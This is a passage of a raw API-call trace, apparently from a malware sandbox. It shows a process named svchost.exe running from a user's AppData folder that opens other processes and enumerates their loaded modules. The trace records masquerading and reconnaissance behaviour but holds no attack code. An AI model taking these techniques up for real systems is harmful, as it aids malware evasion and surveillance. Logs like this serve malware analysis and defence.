lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0072.242] CoTaskMemFree (pv=0xd956b0) [0072.242] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x2433168, cb=0x18 | out: lpmodinfo=0x2433168*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0072.243] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.243] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0072.245] CoTaskMemFree (pv=0xd956b0) [0072.245] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.245] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0072.248] CoTaskMemFree (pv=0xd956b0) [0072.248] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x2435328, cb=0x18 | out: lpmodinfo=0x2435328*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0072.250] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.250] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0072.252] CoTaskMemFree (pv=0xd956b0) [0072.252] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.252] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0072.253] CoTaskMemFree (pv=0xd956b0) [0072.253] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb30000, lpmodinfo=0x2437600, cb=0x18 | out: lpmodinfo=0x2437600*(lpBaseOfDll=0x7fefbb30000, SizeOfImage=0x12a000, EntryPoint=0x7fefbb33810)) returned 1 [0072.255] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.255] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb30000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="WindowsCodecs.dll") returned 0x11 [0072.256] CoTaskMemFree (pv=0xd956b0) [0072.257] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.257] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb30000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")) returned 0x25 [0072.258] CoTaskMemFree (pv=0xd956b0) [0072.258] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x24397e0, cb=0x18 | out: lpmodinfo=0x24397e0*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0072.259] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.259] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0072.261] CoTaskMemFree (pv=0xd956b0) [0072.261] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.261] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0072.263] CoTaskMemFree (pv=0xd956b0) [0072.263] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefaec0000, lpmodinfo=0x243b9a0, cb=0x18 | out: lpmodinfo=0x243b9a0*(lpBaseOfDll=0x7fefaec0000, SizeOfImage=0x34000, EntryPoint=0x7fefaee7cac)) returned 1 [0072.264] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.264] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefaec0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="d3d10_1.dll") returned 0xb [0072.266] CoTaskMemFree (pv=0xd956b0) [0072.266] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.266] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefaec0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")) returned 0x1f [0072.268] CoTaskMemFree (pv=0xd956b0) [0072.268] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefae60000, lpmodinfo=0x243db60, cb=0x18 | out: lpmodinfo=0x243db60*(lpBaseOfDll=0x7fefae60000, SizeOfImage=0x55000, EntryPoint=0x7fefae96b20)) returned 1 [0072.269] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.269] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefae60000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="d3d10_1core.dll") returned 0xf [0072.271] CoTaskMemFree (pv=0xd956b0) [0072.271] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.271] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefae60000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")) returned 0x23 [0072.273] CoTaskMemFree (pv=0xd956b0) [0072.273] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefadb0000, lpmodinfo=0x243fd30, cb=0x18 | out: lpmodinfo=0x243fd30*(lpBaseOfDll=0x7fefadb0000, SizeOfImage=0xa7000, EntryPoint=0x7fefadc050c)) returned 1 [0072.275] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.275] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefadb0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dxgi.dll") returned 0x8 [0072.277] CoTaskMemFree (pv=0xd956b0) [0072.277] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.277] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefadb0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")) returned 0x1c [0072.278] CoTaskMemFree (pv=0xd956b0) [0072.278] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x2441ef0, cb=0x18 | out: lpmodinfo=0x2441ef0*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0072.280] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.280] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0072.282] CoTaskMemFree (pv=0xd956b0) [0072.282] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.282] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0072.284] CoTaskMemFree (pv=0xd956b0) [0072.284] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbca0000, lpmodinfo=0x24440b0, cb=0x18 | out: lpmodinfo=0x24440b0*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0072.286] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.286] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbca0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0072.288] CoTaskMemFree (pv=0xd956b0) [0072.288] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.288] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbca0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0072.289] CoTaskMemFree (pv=0xd956b0) [0072.290] GetModuleInformation (in: hProcess=0x214, hModule=0x779f0000, lpmodinfo=0x2446270, cb=0x18 | out: lpmodinfo=0x2446270*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0072.291] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.291] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x779f0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="PSAPI.DLL") returned 0x9 [0072.304] CoTaskMemFree (pv=0xd956b0) [0072.304] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.304] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x779f0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PSAPI.DLL" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0072.306] CoTaskMemFree (pv=0xd956b0) [0072.306] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x2448430, cb=0x18 | out: lpmodinfo=0x2448430*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0072.308] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.308] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0072.310] CoTaskMemFree (pv=0xd956b0) [0072.310] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.310] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0072.312] CoTaskMemFree (pv=0xd956b0) [0072.312] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x244a600, cb=0x18 | out: lpmodinfo=0x244a600*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0072.314] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.314] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0072.316] CoTaskMemFree (pv=0xd956b0) [0072.316] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.316] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0072.318] CoTaskMemFree (pv=0xd956b0) [0072.318] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x244c7c0, cb=0x18 | out: lpmodinfo=0x244c7c0*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0072.320] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.320] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0072.323] CoTaskMemFree (pv=0xd956b0) [0072.323] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.323] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0072.325] CoTaskMemFree (pv=0xd956b0) [0072.325] CloseHandle (hObject=0x214) returned 1 [0072.330] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.330] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb50) returned 0x214 [0072.330] EnumProcessModules (in: hProcess=0x214, lphModule=0x244f678, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x244f678, lpcbNeeded=0x23ee40) returned 1 [0072.331] GetModuleInformation (in: hProcess=0x214, hModule=0x120000, lpmodinfo=0x244f8e8, cb=0x18 | out: lpmodinfo=0x244f8e8*(lpBaseOfDll=0x120000, SizeOfImage=0x17000, EntryPoint=0x1214a1)) returned 1 [0072.331] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.331] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x120000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="filezilla.exe") returned 0xd [0072.331] CoTaskMemFree (pv=0xd956b0) [0072.332] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.332] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x120000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\filezilla.exe" (normalized: "c:\\program files (x86)\\windows nt\\filezilla.exe")) returned 0x2f [0072.332] CoTaskMemFree (pv=0xd956b0) [0072.332] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2451b08, cb=0x18 | out: lpmodinfo=0x2451b08*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.332] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.332] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.333] CoTaskMemFree (pv=0xd956b0) [0072.333] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.333] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.334] CoTaskMemFree (pv=0xd956b0) [0072.334] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2453cc8, cb=0x18 | out: lpmodinfo=0x2453cc8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0072.334] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.334] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0072.335] CoTaskMemFree (pv=0xd956b0) [0072.335] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.335] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0072.335] CoTaskMemFree (pv=0xd956b0) [0072.335] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2455e88, cb=0x18 | out: lpmodinfo=0x2455e88*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0072.336] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.336] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0072.337] CoTaskMemFree (pv=0xd956b0) [0072.337] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.337] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0072.337] CoTaskMemFree (pv=0xd956b0) [0072.337] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2458058, cb=0x18 | out: lpmodinfo=0x2458058*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0072.338] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.338] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0072.339] CoTaskMemFree (pv=0xd956b0) [0072.339] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.339] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0072.340] CoTaskMemFree (pv=0xd956b0) [0072.340] CloseHandle (hObject=0x214) returned 1 [0072.341] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.341] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x214 [0072.341] EnumProcessModules (in: hProcess=0x214, lphModule=0x245a790, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x245a790, lpcbNeeded=0x23ee40) returned 1 [0072.342] GetModuleInformation (in: hProcess=0x214, hModule=0xb00000, lpmodinfo=0x245aa00, cb=0x18 | out: lpmodinfo=0x245aa00*(lpBaseOfDll=0xb00000, SizeOfImage=0x17000, EntryPoint=0xb014a1)) returned 1 [0072.342] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.342] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xb00000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="analysis-source.exe") returned 0x13 [0072.343] CoTaskMemFree (pv=0xd956b0) [0072.343] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.343] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xb00000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\analysis-source.exe" (normalized: "c:\\program files\\windowspowershell\\analysis-source.exe")) returned 0x36 [0072.344] CoTaskMemFree (pv=0xd956b0) [0072.344] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x245cc38, cb=0x18 | out: lpmodinfo=0x245cc38*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.344] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.344] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.344] CoTaskMemFree (pv=0xd956b0) [0072.345] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.345] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.345] CoTaskMemFree (pv=0xd956b0) [0072.345] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x245edf8, cb=0x18 | out: lpmodinfo=0x245edf8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0072.346] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.346] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0072.346] CoTaskMemFree (pv=0xd956b0) [0072.346] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.346] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0072.347] CoTaskMemFree (pv=0xd956b0) [0072.347] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x2460fb8, cb=0x18 | out: lpmodinfo=0x2460fb8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0072.347] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.347] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0072.348] CoTaskMemFree (pv=0xd956b0) [0072.348] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.348] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0072.349] CoTaskMemFree (pv=0xd956b0) [0072.349] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2463188, cb=0x18 | out: lpmodinfo=0x2463188*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0072.349] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.349] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0072.350] CoTaskMemFree (pv=0xd956b0) [0072.350] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.350] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0072.351] CoTaskMemFree (pv=0xd956b0) [0072.351] CloseHandle (hObject=0x214) returned 1 [0072.353] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.353] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x214 [0072.353] EnumProcessModules (in: hProcess=0x214, lphModule=0x24658a8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24658a8, lpcbNeeded=0x23ee40) returned 1 [0072.353] GetModuleInformation (in: hProcess=0x214, hModule=0x1160000, lpmodinfo=0x2465b18, cb=0x18 | out: lpmodinfo=0x2465b18*(lpBaseOfDll=0x1160000, SizeOfImage=0x17000, EntryPoint=0x11614a1)) returned 1 [0072.354] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.354] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1160000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="far.exe") returned 0x7 [0072.354] CoTaskMemFree (pv=0xd956b0) [0072.354] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.354] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1160000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Mail\\far.exe" (normalized: "c:\\program files\\windows mail\\far.exe")) returned 0x25 [0072.355] CoTaskMemFree (pv=0xd956b0) [0072.355] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2467d18, cb=0x18 | out: lpmodinfo=0x2467d18*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.356] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.356] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.357] CoTaskMemFree (pv=0xd956b0) [0072.357] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.357] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.357] CoTaskMemFree (pv=0xd956b0) [0072.357] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2469ed8, cb=0x18 | out: lpmodinfo=0x2469ed8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0072.358] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.358] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0072.358] CoTaskMemFree (pv=0xd956b0) [0072.359] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.359] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0072.359] CoTaskMemFree (pv=0xd956b0) [0072.359] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x246c098, cb=0x18 | out: lpmodinfo=0x246c098*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0072.360] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.360] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0072.360] CoTaskMemFree (pv=0xd956b0) [0072.360] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.360] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0072.361] CoTaskMemFree (pv=0xd956b0) [0072.361] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x246e268, cb=0x18 | out: lpmodinfo=0x246e268*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0072.362] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.362] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0072.363] CoTaskMemFree (pv=0xd956b0) [0072.363] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.363] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0072.363] CoTaskMemFree (pv=0xd956b0) [0072.363] CloseHandle (hObject=0x214) returned 1 [0072.365] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.365] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x214 [0072.365] EnumProcessModules (in: hProcess=0x214, lphModule=0x24709a0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24709a0, lpcbNeeded=0x23ee40) returned 1 [0072.366] GetModuleInformation (in: hProcess=0x214, hModule=0x340000, lpmodinfo=0x2470c10, cb=0x18 | out: lpmodinfo=0x2470c10*(lpBaseOfDll=0x340000, SizeOfImage=0x17000, EntryPoint=0x3414a1)) returned 1 [0072.366] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.366] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x340000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="miss-single-speech.exe") returned 0x16 [0072.367] CoTaskMemFree (pv=0xd956b0) [0072.367] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.367] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x340000, lpFilename=0xd956b0, 